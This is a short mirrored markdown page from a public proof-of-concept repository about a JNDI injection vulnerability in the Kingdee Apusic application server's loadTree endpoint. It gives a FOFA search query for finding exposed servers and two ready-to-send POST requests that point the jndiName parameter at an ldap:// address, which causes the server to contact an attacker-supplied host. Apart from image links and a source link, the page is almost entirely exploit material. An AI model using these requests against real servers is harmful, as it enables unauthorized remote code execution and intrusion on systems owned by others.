mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
29 lines
720 B
Markdown
29 lines
720 B
Markdown
## 金蝶Apusic应用服务器loadTree JNDI注入漏洞
|
|
|
|
## fofa
|
|
```
|
|
app="Apusic应用服务器"
|
|
```
|
|
|
|
## poc
|
|
```
|
|
POST /appmonitor/protect/jndi/loadTree HTTP/1.1
|
|
host:127.0.0.1
|
|
|
|
jndiName==ldap://地址
|
|
|
|
POST /admin/protect/jndi/loadTree HTTP/1.1
|
|
host:127.0.0.1
|
|
|
|
jndiName==ldap://地址
|
|
```
|
|
|
|

|
|
|
|

|
|
|
|

|
|
|
|
##漏洞来源
|
|
- https://mp.weixin.qq.com/s/iEHmFOKq5LT2x9Hp1ysLIw
|